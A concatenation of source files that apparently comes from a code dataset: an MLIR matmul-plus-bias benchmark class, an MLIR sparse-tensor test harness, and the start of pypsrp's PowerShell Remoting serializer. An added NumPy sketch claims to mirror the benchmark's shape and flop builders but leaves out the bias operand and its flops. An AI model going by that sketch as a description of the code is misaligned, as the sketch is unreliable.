def shapes_builder(self, sizes: Mapping[str, Any]) -> List[List[int]]:
"""Shape builder function.
Given a mapping between dimension names / op attributes and their numeric
values, return the list of lists of shapes of the FuncOp operands. The
FuncOp is responsible for distinguishing between input operands and results.
"""
M, N, K = sizes["M"], sizes["N"], sizes["K"]
return [
[M, K],
[K, N],
[N],
[M, N],
]
def gflop_count_builder(self, sizes: Mapping[str, Any]) -> float:
"""GFlop builder function.
Given a mapping between dimension names / op attributes and their numeric
values, return the number of GFlops computed.
"""
M, N, K = sizes["M"], sizes["N"], sizes["K"]
return float(2.0 * M * N * K + M * N) / float(1e9)
def gbyte_count_builder(self, sizes: Mapping[str, Any],
types: Sequence[np.dtype]) -> float:
"""GByte builder function.
Given a mapping between dimension names / op attributes and their numeric
values, and a list of data types, return the number of GBytes read or
written.
"""
M, N, K = sizes["M"], sizes["N"], sizes["K"]
lhs_np_type, rhs_np_type, acc_np_type, res_np_type = types
return float(M * K * np.dtype(lhs_np_type).itemsize +
K * N * np.dtype(rhs_np_type).itemsize +
N * np.dtype(acc_np_type).itemsize +
M * N * np.dtype(res_np_type).itemsize) / float(1e9)
def tensors_np_builder(self, sizes: Mapping[str, Any],
types: Sequence[np.dtype]) -> List[np.dtype]:
"""NumPy tensors building function.
Given a mapping between dimension names / op attributes and their numeric
values, and a list of NumPy elemental types, return constructed NP values of
    shapes given by `shapes_builder` and specified elemental types.
"""
shapes = self.shapes_builder(sizes)
tensors = [
realign(np.random.rand(*s).astype(t), byte_alignment=64)
for s, t in zip(shapes, types)
]
tensors[len(tensors) - 1].fill(0.)
return tensors
def check_np(self, A: np.dtype, B: np.dtype, C: np.dtype,
D: np.dtype) -> None:
"""NumPy checking function.
    Given a list of NumPy values, check that the precomputed results match those of
the expected reference implementation.
"""
res = np.dot(A, B) + C
if not np.allclose(D, res):
delta = D - res
max_abs_delta = max(delta.max(), delta.min(), key=abs)
raise Exception(f"max_abs_delta: {max_abs_delta} -> FAILURE ")
def types_mlir_builder(self, sizes: Mapping[str, Any],
types: Sequence[Type]) -> List[Type]:
"""MLIR types builder.
Given a mapping between dimension names / op attributes and their numeric
values, and a list of elemental MLIR types, return MLIR tensor types of the
shape expected by the function.
"""
shapes = self.shapes_builder(sizes)
return [RankedTensorType.get(s, t) for s, t in \
zip(shapes, list(types) + [types[-1]])]
def build_problem_under_context_manager(
self, name: str, types: Sequence[Type],
zero_at_each_iteration: bool) -> builtin.FuncOp:
"""MLIR problem builder.
Given a list of MLIR shaped types, build and return the MLIR FuncOp that
implements the desired computation on those types.
"""
global avx512
# Actual benchmarked function called under entry_point_name.
bench = builtin.FuncOp(name, (types, [types[-1]]))
# TODO: need something much more flexible to add function argument attributes.
attach_inplaceable_attributes(bench, inplaceable=[False, False, False, True])
attach_passthrough(
bench, [StringAttr.get(os.getenv('SANDBOX_INLINING', 'noinline'))],
avx512=avx512)
acc_type = types[-2].element_type
with InsertionPoint(bench.add_entry_block()):
tensor_zero = bench.arguments[3]
if zero_at_each_iteration:
zero = arith.ConstantOp(types[-1].element_type, 0.0)
tensor_zero = linalg.FillOp(output=tensor_zero, value=zero)
matmul = linalg.matmul(bench.arguments[0],
bench.arguments[1],
outs=[tensor_zero])
bias_add = add_bias_to_2d(matmul,
bench.arguments[2],
outs=[bench.arguments[3]])
# linalg.matmul returns a Value instead of OpView, so we have to manually
# wrap it in a list here.
func.ReturnOp([bias_add])
return bench
```
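A minimal NumPy-only sketch of what the builders above compute (illustrative; it mirrors `shapes_builder`, `gflop_count_builder` and `check_np` without touching the MLIR builders):
```python
import numpy as np

# Sizes for one benchmark instance of the fill + matmul problem.
M, N, K = 64, 64, 64

# Operand shapes as returned by shapes_builder: A, B and the accumulator C.
shapes = [[M, K], [K, N], [M, N]]

# GFlop count as computed by gflop_count_builder: 2 * M * N * K flops.
gflops = 2.0 * M * N * K / 1e9

# Reference check mirroring check_np: the result must match np.dot(A, B).
A, B = np.random.rand(M, K), np.random.rand(K, N)
C = A @ B
assert np.allclose(C, np.dot(A, B))
print(shapes, gflops)
```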
#### File: examples/sparse/test_common.py
```python
from enum import Enum
import dataclasses
from typing import Any, Callable, List, Optional, Tuple
import argparse
import ctypes
import itertools
import logging
import numpy as np
import os
import random
# Import MLIR related modules.
from mlir import execution_engine as ee
from mlir import ir
from mlir import runtime
from mlir.dialects import builtin
from mlir.dialects import func
from mlir.dialects import sparse_tensor as st
from mlir.dialects.linalg.opdsl import lang as dsl
# Import compilation utilities for the tests.
from ..core import experts
# Message to print out when tests stop with failure.
FAILURE_MESSAGE = "FAILURE"
# Generate a non-zero every 5 values to achieve 20% density.
_STEP_FOR_NON_ZERO_VALUES = 5
# The non-zero values used by the generator, if not provided by the tests.
_DEFAULT_NON_ZERO_VALUES = (1, 2, 3, 4, 5)
# A plane has two dimensions.
_RANK_FOR_PLANE = 2
# A default seed to initialize random state.
_DEFAULT_SEED = 5
# The name for the environment variable that provides the full path for the
# supporting library.
_SUPPORTLIB_ENV_VAR = "SUPPORTLIB"
# The default supporting library if the environment variable is not provided.
_DEFAULT_SUPPORTLIB = "libmlir_c_runner_utils.so"
# The JIT compiler optimization level.
_OPT_LEVEL = 2
# The entry point to the JIT compiled program.
_ENTRY_NAME = "main"
# TODO(b/195340661): Add bitwidth 8.
# Bitwidths for pointer and indices.
_SUPPORTED_BIT_WIDTHS = (0, 16, 32, 64)
# Sparse codegen parallelization options.
_SUPPORTED_PARALLELIZATION_OPTIONS = (0, 1, 2, 3, 4)
# Sparse codegen vector lengths.
_SUPPORTED_VECTOR_LENGTHS = (1, 16, 64)
# Available sparsity values for each tensor dimension.
_SUPPORTED_SPARSITY_VALUES = (st.DimLevelType.dense, st.DimLevelType.compressed)
# Alias for annotating the type for the function object used to invoke the
# compiler.
CompilerType = Callable[
[ir.Module, Callable[[str, List[st.EncodingAttr]], str]], ir.Module]
class _Scheme(Enum):
"""Schemes for generating non-zero values for sparse input tensors.
* `DOT`: A scheme for generating non-zero values as scattered dots.
* `PLANE`: A scheme for generating non-zero values in hyperplanes.
"""
DOT = 0
PLANE = 1
class TDType(Enum):
""" The data types being tested."""
# TODO(b/195340661): Add int8.
I16 = np.int16
I32 = np.int32
I64 = np.int64
# numpy _ctype_from_dtype_scalar can't handle float16 yet.
F32 = np.float32
F64 = np.float64
def mlir_type_from_td_type(td_type: TDType) -> ir.Type:
  """Returns the MLIR type that corresponds to the given test descriptor type."""
tdtype_to_irtype = {
TDType.I16: ir.IntegerType.get_signless(16),
TDType.I32: ir.IntegerType.get_signless(32),
TDType.I64: ir.IntegerType.get_signless(64),
TDType.F32: ir.F32Type.get(),
TDType.F64: ir.F64Type.get()
}
return tdtype_to_irtype[td_type]
# Supported integer types.
_SUPPORTED_INT_TYPES = (TDType.I16, TDType.I32, TDType.I64)
# Supported floating point types.
_SUPPORTED_FP_TYPES = (TDType.F32, TDType.F64)
def _generate_tensor_dot(shape: List[int], values: Tuple[int, ...],
first_nonzero_pos: int) -> List[int]:
"""Generates a tensor with non-zero values as scattered dots."""
num_elements = np.prod(shape)
num_generated = 0
num_available = len(values)
data = []
for i in range(num_elements):
if (i % _STEP_FOR_NON_ZERO_VALUES) == first_nonzero_pos:
data.append(values[num_generated % num_available])
num_generated += 1
else:
data.append(0)
return data
def _generate_tensor_plane(shape: List[int], values: Tuple[int, ...],
first_nonzero_pos: int) -> List[int]:
"""Generates a tensor with non-zero values on planes."""
plane_shape = shape[-_RANK_FOR_PLANE:]
other_shape = shape[:-_RANK_FOR_PLANE]
num_plane_elements = np.prod(plane_shape)
num_other_elements = np.prod(other_shape)
num_generated = 0
num_available = len(values)
data = []
for j in range(num_other_elements):
for i in range(num_plane_elements):
if (i % _STEP_FOR_NON_ZERO_VALUES) == first_nonzero_pos:
data.append(values[num_generated % num_available])
num_generated += 1
else:
data.append(0)
return data
def generate_tensor(shape: List[int],
scheme: Optional[_Scheme] = None,
values: Optional[Tuple[int, ...]] = None,
seed: int = _DEFAULT_SEED) -> List[int]:
"""Generates values for a sparse input tensor.
Args:
shape: A list of integers, representing the dimensions of the input tensor.
scheme: An Enum value of _Scheme, representing the scheme to be used. If a
scheme is not provided, a scheme is chosen randomly.
values: A tuple of integers used cyclically as the non-zero values for
generating the sparse tensor.
seed: An integer value to initialize the random number generator state. The
random number generator is used to select a generation scheme when a
scheme is not provided and to decide on the position of the first non-zero
value.
Returns:
The sparse tensor value represented as a list of integers.
"""
  random_state = np.random.RandomState(seed)
if len(shape) <= 2:
# When rank <= 2, _Scheme.PLANE degenerates to _Scheme.DOT.
scheme = _Scheme.DOT
elif scheme is None:
# If a scheme is not specified, randomly choose a scheme.
scheme = _Scheme.PLANE if random_state.choice(2) else _Scheme.DOT
values = values or _DEFAULT_NON_ZERO_VALUES
  # Generate a random value in range 0.._STEP_FOR_NON_ZERO_VALUES to randomize
# the position of the first non-zero value.
first_nonzero_pos = random_state.choice(_STEP_FOR_NON_ZERO_VALUES)
# Generate the data as a list of values.
data = (_generate_tensor_dot(shape, values, first_nonzero_pos)
if scheme == _Scheme.DOT else _generate_tensor_plane(
shape, values, first_nonzero_pos))
return data
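# Illustrative call: a 4x6 tensor at roughly 20% density, cycling through
# _DEFAULT_NON_ZERO_VALUES for the non-zero entries.
#   dense = np.array(generate_tensor([4, 6])).reshape(4, 6)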
@dataclasses.dataclass(frozen=True)
class InputDesc:
"""Describing an input for the operation being tested.
Attributes:
ordering: A list of integers for the storage ordering of the input
dimensions.
sparsity: A list of DimLevelType for the sparsity of each input dimension.
    pointer_bw: An integer pointer bit width.
index_bw: An integer index bit width.
"""
ordering: List[int]
sparsity: List[st.DimLevelType]
pointer_bw: int
index_bw: int
def __post_init__(self):
if len(self.ordering) != len(self.sparsity):
raise ValueError("Different lengths for ordering and sparsity: " +
f"{len(self.ordering)} != {len(self.sparsity)}.")
if sorted(self.ordering) != list(range(len(self.ordering))):
raise ValueError("Problem with ordering: " + f"{str(self.ordering)} != " +
f"permutation{str(list(range(len(self.ordering))))}.")
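# Illustrative descriptor: a rank-2 input with a permuted storage ordering, one
# dense and one compressed dimension, and the default pointer/index bit widths:
#   InputDesc([1, 0], [st.DimLevelType.dense, st.DimLevelType.compressed], 0, 0)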
def _ctype_pointer_from_array(array) -> ctypes.POINTER:
"""Returns the ctype pointer for the given numpy array."""
return ctypes.pointer(
ctypes.pointer(runtime.get_ranked_memref_descriptor(array)))
class TestDesc:
  """Describing a test for an operation.
A test descriptor has the following properties:
inputs: A read-only property to access the input affine expressions.
outputs: A read-only property to access the output affine expressions.
linalg_op: A writable property to access the linear algebra operation
      being tested.
"""
# A TestDesc has the following attributes:
# _name: The name of the test.
# _iter_space: Represents the affine expression definition and the size for
# each dimension in the iteration space.
# _input_affines: The list of inputs. Each input for the operation being
# tested is defined by a list of affine expression definition.
# _input_tensors: The list of input tensors. Each input tensor is represented
# as a list of integers.
  # _output: The output for the operation being tested, represented as a list of
# affine expression definitions.
# _linalg_op: The operation being tested. This is assigned after the object
# is defined because the definition of linalg_op requires other fields in
# the TestDesc object and we can't move the definition of _linalg_op to
# TestDesc.
# _ref_result: The reference result of the test, set up through method
# calculate_reference_result.
@property
def inputs(self) -> List[List[dsl.AffineExprDef]]:
"""The input affine expressions."""
return self._input_affines
def _get_dims_from_affine_expr(
self, affine_exps: List[dsl.AffineExprDef]) -> List[int]:
"""Returns the dimensions for the affine expression."""
return [self._iter_space[exp] for exp in affine_exps]
def _get_input_dims(self, index: int) -> List[int]:
"""Returns the dimension values for the given input."""
return self._get_dims_from_affine_expr(self.inputs[index])
def __init__(self, name: str, iter_space_exps: List[dsl.AffineExprDef],
iter_space_sizes: List[int], output: List[dsl.AffineExprDef],
*inputs: List[List[dsl.AffineExprDef]]):
"""Constructs a test descriptor.
Args:
name: The name of the test.
iter_space_exps: A list of AffineExprDef, representing the affine
expression definition for each dimension in the iteration space.
iter_space_sizes: A list of integers, representing the size for each
dimension in the iteration space.
output: A list of AffineExprDef, representing the affine expression
definition for each dimension in the output tensor.
inputs: All the inputs for the operation being tested. Each input is
represented by a list of AffineExprDef, representing the affine
expression definition for each dimension in the input tensor.
Raises:
ValueError: When there is a problem with the inputs. The lengths of
iter_space_exps and iter_space_sizes should equal. Affine expressions
used by output/inputs should be defined in iter_space_exps. Values in
iter_space_sizes should be larger than zero.
"""
if len(iter_space_exps) != len(iter_space_sizes):
raise ValueError("Different lengths for iter_space_exps and " +
"iter_space_size: " +
f"{len(iter_space_exps)} != {len(iter_space_sizes)}.")
if any(v <= 0 for v in iter_space_sizes):
raise ValueError("iter_space_sizes contains values not larger than 0: " +
f"{str(iter_space_sizes)}.")
self._iter_space = dict(zip(iter_space_exps, iter_space_sizes))
self._linalg_op = None
self._ref_result = None
# Verify each affine expression in output.
for affine in output:
if affine not in self._iter_space:
raise ValueError(f"Output affine expression {str(affine)}" +
" not defined in the iteration space.")
self._output = output
self._name = name
self._input_affines = []
self._input_tensors = []
for index, affines in enumerate(inputs):
# Verify each affine expression in the input.
for affine in affines:
if affine not in self._iter_space:
raise ValueError(f"Input affine expression {str(affine)}" +
" not defined in the iteration space.")
self._input_affines.append(affines)
self._input_tensors.append(generate_tensor(self._get_input_dims(index)))
@property
def output(self) -> List[dsl.AffineExprDef]:
"""The output affine expressions."""
return self._output
@property
def linalg_op(self) -> dsl.LinalgOpDef:
"""The linear algebra operation being tested."""
return self._linalg_op
@linalg_op.setter
def linalg_op(self, op: Callable[..., dsl.DefinedOpCallable]) -> None:
self._linalg_op = op
def _get_num_inputs(self) -> int:
"""Returns the total number of inputs for the operation being tested."""
return len(self._input_affines)
def _get_output_dims(self) -> List[int]:
"""Returns the dimension values for the output."""
return self._get_dims_from_affine_expr(self.output)
def _get_inputs_for_type(self, type: TDType) -> List[np.ndarray]:
"""Returns a list of numpy array with the given type for the inputs."""
return [
np.array(v,
dtype=type.value).reshape(self._get_dims_from_affine_expr(a))
for v, a in zip(self._input_tensors, self._input_affines)
]
def _emit_main_function(self, callee_name: str, td_type: TDType,
attrs: List[st.EncodingAttr]):
"""Emits the 'main' method to call the `callee_name` function.
The function is emitted at the current insertion point, assumed to be within
a module. This function contains the following:
- Set up input tensors.
- Call the callee function.
- Return the result of the function call.
Args:
      callee_name: The name of the function for the operation being tested.
td_type: The data type used to run the operation being tested.
attrs: A list of EncodingAttr, one for each input of the operation being
tested.
"""
# Define the main function.
mlir_type = mlir_type_from_td_type(td_type)
num_inputs = self._get_num_inputs()
input_types = [
ir.RankedTensorType.get(self._get_input_dims(i), mlir_type)
for i in range(num_inputs)
]
output_types = [ir.RankedTensorType.get(self._get_output_dims(), mlir_type)]
main_func = builtin.FuncOp(_ENTRY_NAME,
(input_types + output_types, output_types),
visibility="public")
main_func.attributes["llvm.emit_c_interface"] = ir.UnitAttr.get()
# Convert the operands to sparse encodings, call the callee and return its
# result.
with ir.InsertionPoint(main_func.add_entry_block()):
converted_tensors = []
for i, argument, encoding in zip(range(num_inputs), main_func.arguments,
attrs):
conversion = st.ConvertOp(
ir.RankedTensorType.get(self._get_input_dims(i), mlir_type,
encoding), argument)
converted_tensors.append(conversion.dest)
call = func.CallOp(output_types, ir.FlatSymbolRefAttr.get(callee_name),
converted_tensors + [main_func.arguments[-1]])
func.ReturnOp(call.results)
def _build_module_and_engine(
self, compiler: CompilerType, type: TDType,
attrs: List[st.EncodingAttr]) -> ee.ExecutionEngine:
"""Builds the program and the execution engine.
Args:
compiler: A Callable object for invoking the compiler.
type: The data type for the operation being tested.
attrs: A list of EncodingAttr, one for each input of the operation being
tested.
Returns:
The execution engine that executes the JIT compiled operation.
"""
module = ir.Module.create()
# Build the data types for the inputs and output.
ir_type = mlir_type_from_td_type(type)
inputs_output = []
for i in range(self._get_num_inputs()):
inputs_output.append(
ir.RankedTensorType.get(self._get_input_dims(i), ir_type, attrs[i]))
inputs_output.append(
ir.RankedTensorType.get(self._get_output_dims(), ir_type))
# Build the kernel for the linalg operation being tested.
with ir.InsertionPoint(module.body):
@builtin.FuncOp.from_py_func(*inputs_output)
def linalg_funcop(*args):
return self._linalg_op(*args[:-1], outs=[args[len(args) - 1]])
self._emit_main_function(linalg_funcop.__name__, type, attrs)
# Invoke JIT compilation.
compiled_module = compiler(_ENTRY_NAME, module)
    # We currently rely on an environment variable to pass in the full path for a
# supporting library to overwrite the default supporting library.
support_lib = os.getenv(_SUPPORTLIB_ENV_VAR, _DEFAULT_SUPPORTLIB)
engine = ee.ExecutionEngine(compiled_module,
opt_level=_OPT_LEVEL,
shared_libs=[support_lib])
return engine
def _compile_and_run(self, compiler: CompilerType, type: TDType,
attrs: List[st.EncodingAttr],
inputs: List[np.ndarray]) -> np.ndarray:
"""Compiles and executes the test.
Args:
      compiler: A Callable object for invoking the compiler.
      type: The data type for the operation being tested.
attrs: A list of EncodingAttr, one for each input of the operation being
tested.
inputs: A list of numpy arrays for the input tensors.
Returns:
      The output of the operation being tested, represented as a numpy array.
"""
# Numpy arrays are accessed by MLIR computation via their ctype pointers.
# Gather a list of ctype pointers for the numpy arrays.
ctype_pointers = []
output_dims = self._get_output_dims()
# Add the pointer for the output tensor.
c_out = np.zeros(output_dims, type.value)
ctype_pointers.append(_ctype_pointer_from_array(c_out))
# Add the pointers for the input tensors.
for i in range(self._get_num_inputs()):
ctype_pointers.append(_ctype_pointer_from_array(inputs[i]))
# Add the pointer for the initial value of the output tensor. Currently,
# the initial value and the output value have to be different.
c_init = np.zeros(output_dims, type.value)
ctype_pointers.append(_ctype_pointer_from_array(c_init))
# Invoke JIT compilation, then execute the compiled code.
with ir.Context() as ctx, ir.Location.unknown():
engine = self._build_module_and_engine(compiler, type, attrs)
engine.invoke(_ENTRY_NAME, *ctype_pointers)
return runtime.ranked_memref_to_numpy(ctype_pointers[0][0])
def get_result(self, p: int, vl: int, type: TDType,
input_descs: List[InputDesc]) -> np.ndarray:
"""Returns the result for the test for the given codegen parameters.
Args:
p: An integer representing the parallelization strategy.
vl: An integer representing the vector length.
type: The TDType for the result.
input_descs: A list of InputDesc, representing dimension ordering and
sparsity for the input tensors.
Returns:
The result produced by executing the compiled code.
"""
with ir.Context() as ctx:
inputs = self._get_inputs_for_type(type)
attrs = []
for desc in input_descs:
perm = ir.AffineMap.get_permutation(desc.ordering)
attr = st.EncodingAttr.get(desc.sparsity, perm, desc.pointer_bw,
desc.index_bw)
attrs.append(attr)
v = 0 if vl == 1 else 1
# TODO(b/195340661): When vl is non-trivial, enumerates the options for
# enable-simd-index32.
si = False
opt = (f"parallelization-strategy={p} "
f"vectorization-strategy={v} vl={vl} "
f"enable-simd-index32={si}")
compiler = experts.ExpertSparseCompiler(options=opt)
return self._compile_and_run(compiler, type, attrs, inputs)
def calculate_reference_result(self, type: TDType) -> None:
"""Calculates the reference result for the test.
Args:
type: The data type used to run the operation to get the reference result.
    Uses a default set of codegen parameters to compile the test and stores the
    result produced by executing the compiled code in the _ref_result attribute.
"""
with ir.Context() as ctx:
input_descs = []
for i in range(self._get_num_inputs()):
input_descs.append(
InputDesc(list(range(len(self._input_affines[i]))),
[st.DimLevelType.dense] * len(self._input_affines[i]), 0,
0))
self._ref_result = self.get_result(0, 1, type, input_descs)
def get_reference_result(self, type: TDType) -> np.ndarray:
""" Returns the reference result for the test.
This routine assumes calculate_reference_result has been called to
calculate the result and record the result in the attribute.
Args:
type: The data type for the output result.
Returns:
Converts the pre-calculated reference result to the desired data type and
returns the result.
Raises:
ValueError: if calculate_reference_result is not called to make the
reference result available.
"""
if self._ref_result is None:
raise ValueError("Need to call calculate_reference_result to set up" +
" the reference result.")
return self._ref_result.astype(type.value)
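# Typical flow (sketch): build a TestDesc, assign its linalg_op, call
# calculate_reference_result(...) once, then compare get_result(...) for each
# codegen parameter combination against get_reference_result(...).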
# Defines the annotation and codegen options used for the exhaustive tests.
def sparsities2() -> List[Tuple[st.DimLevelType, st.DimLevelType]]:
"""Enumerates the sparsities for an input with rank 2."""
return itertools.product(_SUPPORTED_SPARSITY_VALUES,
_SUPPORTED_SPARSITY_VALUES)
def sparsities3(
) -> List[Tuple[st.DimLevelType, st.DimLevelType, st.DimLevelType]]:
"""Enumerates the sparsities for an input with rank 3."""
return itertools.product(_SUPPORTED_SPARSITY_VALUES,
_SUPPORTED_SPARSITY_VALUES,
_SUPPORTED_SPARSITY_VALUES)
# TODO(b/195340661): Add a method to generate a permutation for range(n) to
# support larger rank values. This will retire the use of the constant values.
def orderings2() -> List[List[int]]:
  """Enumerates the storage orderings for an input with rank 2."""
return [[0, 1], [1, 0]]
# TODO(b/195340661): Add a method to generate a permutation for range(n) to
# support larger rank values. This will retire the use of the constant values.
def orderings3() -> List[List[int]]:
"""Enumerates the storage orderings for an input with rank 3."""
return [[0, 1, 2], [0, 2, 1], [1, 0, 2], [1, 2, 0], [2, 0, 1], [2, 1, 0]]
# TODO(b/195340661): Add bitwidth 8.
def bitwidths() -> Tuple[int, ...]:
"""Enumerates the bit widths to be tested."""
return _SUPPORTED_BIT_WIDTHS
def pars() -> Tuple[int, ...]:
"""Enumerates the parallelization option values."""
return _SUPPORTED_PARALLELIZATION_OPTIONS
def vls() -> Tuple[int, ...]:
"""Enumerates the vector length option values."""
return _SUPPORTED_VECTOR_LENGTHS
def int_types() -> Tuple[TDType, ...]:
"""Enumerates the integer data types to be tested."""
return _SUPPORTED_INT_TYPES
def fp_types() -> Tuple[TDType, ...]:
"""Enumerates the floating point data types to be tested."""
return _SUPPORTED_FP_TYPES
def all_types() -> Tuple[TDType, ...]:
"""Enumerates all the data types to be tested."""
return _SUPPORTED_INT_TYPES + _SUPPORTED_FP_TYPES
def supported_tensor_types(type: TDType, pw: int, iw: int):
""" Checks whether the tensor type combination is supported.
Args:
type: A TDType enum for the data type of the tensor values.
pw: The pointer bitwidth for the tensor storage representation.
iw: The index bitwidth for the tensor storage representation.
Returns:
A boolean value to indicate whether the combination is supported (True) or
not supported (False).
"""
# newSparseTensor only supports pw == iw for integer types. For int64, it only
# supports pw == iw == 64.
return (type
not in _SUPPORTED_INT_TYPES) or (pw == iw and
(type != TDType.I64 or pw == 64))
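# Illustrative outcomes of the rule above:
#   supported_tensor_types(TDType.F32, 16, 32) -> True  (floats: any widths)
#   supported_tensor_types(TDType.I16, 16, 16) -> True  (pw == iw)
#   supported_tensor_types(TDType.I64, 32, 32) -> False (int64 needs pw == iw == 64)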
def _get_command_line_values() -> Tuple[int, int]:
"""Parses the command line and returns (num_processes, log_level)."""
parser = argparse.ArgumentParser()
parser.add_argument(
"-num_processes",
type=int,
required=False,
default=os.cpu_count(),
help="the number of processes to run the test (default os.cpu_count())")
parser.add_argument("-log",
choices=["info", "error"],
default="info",
help="the logging level (default=info)"),
args = parser.parse_args()
levels = {
"error": logging.ERROR,
"info": logging.INFO,
}
return args.num_processes, levels[args.log]
def _run_tests_sequential(parameter_combinations: Callable[[], Tuple[Any, ...]],
run_test: Callable[..., bool]) -> bool:
"""Tests all combinations sequentially."""
return all(run_test(*c) for c in parameter_combinations())
def _run_tests_parallel(num_processes: int,
parameter_combinations: Callable[[], Tuple[Any, ...]],
run_test: Callable[..., bool]) -> bool:
"""Tests all combinations in parallel with the given number of processes."""
# Python multiprocessing doesn't work within Google. Import the Pool module
  # only when multiprocessing is enabled for this reason.
from multiprocessing import Pool
with Pool(num_processes) as pool:
# For each combination, assign a job to the worker pool and return a
# placeholder object for getting the test result. We use `c` not `*c` here
# as apply_async unpacks the tuple.
result_objs = [
pool.apply_async(run_test, c) for c in parameter_combinations()
]
# Get the results of the tests using the placeholder objects.
return all(result.get() for result in result_objs)
def run_tests_sequential_or_parallel(num_processes: int,
parameter_combinations: Callable[[], Tuple[
Any, ...]],
run_test: Callable[..., bool]) -> bool:
"""Runs the tests with the given number of processes.
Args:
num_processes: An integer for the number of processes used to run the tests.
The tests are run in parallel when this value is larger than one.
parameter_combinations: A Callable object for generating all the
combinations of the parameter values used to invoke run_test.
run_test: A Callable object for running a test with a given combination of
parameter values.
Returns:
A boolean to indicate whether all tests pass (True) or there are failing
tests (False).
"""
return (_run_tests_sequential(parameter_combinations, run_test)
if num_processes <= 1 else _run_tests_parallel(
num_processes, parameter_combinations, run_test))
def get_num_processes_and_run_tests(module_name: str,
test_driver: Callable[[int], bool]) -> bool:
"""Determines the number of processes and invokes the test driver.
The tests run differently in OSS vs in Google for two reasons.
- In Google, we use a python script to load and execute the module that
contains the tests to support the loading of the MLIR libraries. In OSS, we
directly run the module that contains the tests.
- Python multiprocessing works in OSS but doesn't work in Google.
As such, we only enable the commandline parser and multiprocessing when the
module is run directly.
Args:
module_name: The __name__ of the module that contains the tests, used to
determine whether the module is run directly or not.
test_driver: A callable object to run all tests in the module with the given
number of processes.
Returns:
A boolean to indicate whether all tests pass (True) or there are failing
tests (False).
"""
if module_name != "__main__":
num_processes = 1
log_level = logging.INFO
else:
num_processes, log_level = _get_command_line_values()
logging.basicConfig(level=log_level)
return test_driver(num_processes)
def test_combination_wrapper(
test_combination: Callable[..., bool]) -> Callable[..., int]:
"""Wraps a test function with post processing functionality.
In particular, the wrapper invokes test_combination, logs the test and its
status, and returns a boolean to indicate the status of passing (True) or
failing (False).
Args:
test_combination: A Callable object for invoking the test with one
combination of the test parameters, and returns a boolean to indicate the
status of passing (True) or failing (False).
Returns:
A wrapper of the given test_combination function.
"""
def wrapper(*args) -> int:
passed = test_combination(*args)
status_str = "passed" if passed else "failed"
test_name = "_".join([str(i) for i in args])
logging.info(f"test_{test_name} {status_str}.")
return passed
return wrapper
``` |
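A small driver sketch for the harness above (illustrative; the `test_common` import path is an assumption and the test body is a stand-in for a real kernel comparison):
```python
import itertools

# Assumption: the module above is importable as `test_common`; the actual
# package path depends on the repository layout.
import test_common


@test_common.test_combination_wrapper
def run_one(par: int, vl: int) -> bool:
  # Stand-in check; a real test would build a TestDesc, compile it via
  # get_result(par, vl, ...) and compare against the reference result.
  return par in test_common.pars() and vl in test_common.vls()


def combinations():
  # One tuple of arguments per invocation of run_one.
  return itertools.product(test_common.pars(), test_common.vls())


def driver(num_processes: int) -> bool:
  return test_common.run_tests_sequential_or_parallel(num_processes,
                                                      combinations, run_one)


if __name__ == "__main__":
  # Run sequentially here; get_num_processes_and_run_tests(__name__, driver)
  # would honor the -num_processes command line flag instead.
  print("PASSED" if driver(1) else test_common.FAILURE_MESSAGE)
```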
{
"source": "00mjk/pypsrp",
"score": 2
} |
#### File: src/pypsrp/serializer.py
```python
import base64
import binascii
import logging
import re
import typing
import uuid
import xml.etree.ElementTree as ET
from copy import copy
from queue import Empty, Queue
from cryptography.hazmat.primitives.padding import PKCS7
from pypsrp._utils import to_bytes, to_string, to_unicode
from pypsrp.complex_objects import (
ApartmentState,
Color,
CommandMetadataCount,
CommandOrigin,
ComplexObject,
Coordinates,
CultureInfo,
DictionaryMeta,
GenericComplexObject,
HostMethodIdentifier,
InformationalRecord,
KeyInfoDotNet,
ListMeta,
ObjectMeta,
ParameterMetadata,
PipelineResultTypes,
ProgressRecordType,
PSCredential,
PSThreadOptions,
QueueMeta,
RemoteStreamOptions,
SessionStateEntryVisibility,
Size,
StackMeta,
)
from pypsrp.exceptions import SerializationError
from pypsrp.messages import (
DebugRecord,
ErrorRecordMessage,
InformationRecord,
VerboseRecord,
WarningRecord,
)
log = logging.getLogger(__name__)
class Serializer(object):
def __init__(self) -> None:
self.obj_id = 0
self.obj: typing.Dict = {}
self.tn_id = 0
self.tn: typing.Dict = {}
self.cipher: typing.Any = None
# Finds C0, C1 and surrogate pairs in a unicode string for us to
# encode according to the PSRP rules
self._serial_str = re.compile("[\u0000-\u001F\u007F-\u009F\U00010000-\U0010FFFF]")
# to support surrogate UTF-16 pairs we need to use a UTF-16 regex
# so we can replace the UTF-16 string representation with the actual
# UTF-16 byte value and then decode that
self._deserial_str = re.compile(b"\\x00_\\x00x([\\0\\w]{8})\\x00_")
def serialize(
self,
value: typing.Any,
metadata: typing.Optional[ObjectMeta] = None,
parent: typing.Optional[ET.Element] = None,
clear: bool = True,
) -> typing.Optional[ET.Element]:
"""
Serializes a raw value or class into an XML Element that can be sent
over to the remote host.
:param value: The value to serialize
:param metadata: Any extra metadata to control how to serialize the
value, if None then the value will be inferred by the type
:param parent: Whether to append the element onto a parent element
:param clear: Whether to clear the Obj and TN reference map, this
should only be True when initially calling serialize
:return: The XML Element from the serializied value
"""
if clear:
self._clear()
if isinstance(value, ET.Element):
if metadata is not None and metadata.name is not None:
value.attrib["N"] = metadata.name
if parent is not None:
parent.append(value)
return value
metadata = metadata or ObjectMeta()
if metadata.tag == "*":
if isinstance(value, TaggedValue):
metadata.tag = value.tag
value = value.value
else:
metadata.tag = self._get_tag_from_value(value)
pack_function: typing.Callable[[ObjectMeta, typing.Any], ET.Element] = { # type: ignore[assignment] # Not sure why
            # primitive types
            "S": lambda m, d: self._serialize_string(d),
            "ToString": lambda m, d: self._serialize_string(d),
"C": lambda m, d: str(ord(d)),
"B": lambda m, d: str(d).lower(),
"DT": lambda m, d: None,
"TS": lambda m, d: str(d),
"By": lambda m, d: str(d),
"SB": lambda m, d: str(d),
"U16": lambda m, d: str(d),
"I16": lambda m, d: str(d),
"U32": lambda m, d: str(d),
"I32": lambda m, d: str(d),
"U64": lambda m, d: str(d),
"I64": lambda m, d: str(d),
"Sg": lambda m, d: str(d),
"Db": lambda m, d: str(d),
"D": lambda m, d: str(d),
"BA": lambda m, d: to_string(base64.b64encode(d)),
"G": lambda m, d: str(d),
"URI": lambda m, d: self._serialize_string(d),
"Version": lambda m, d: str(d),
"XD": lambda m, d: self._serialize_string(d),
"SBK": lambda m, d: self._serialize_string(d),
"SS": lambda m, d: self._serialize_secure_string(d),
"Obj": self._serialize_obj,
"ObjDynamic": self._serialize_dynamic_obj,
"LST": self._serialize_lst,
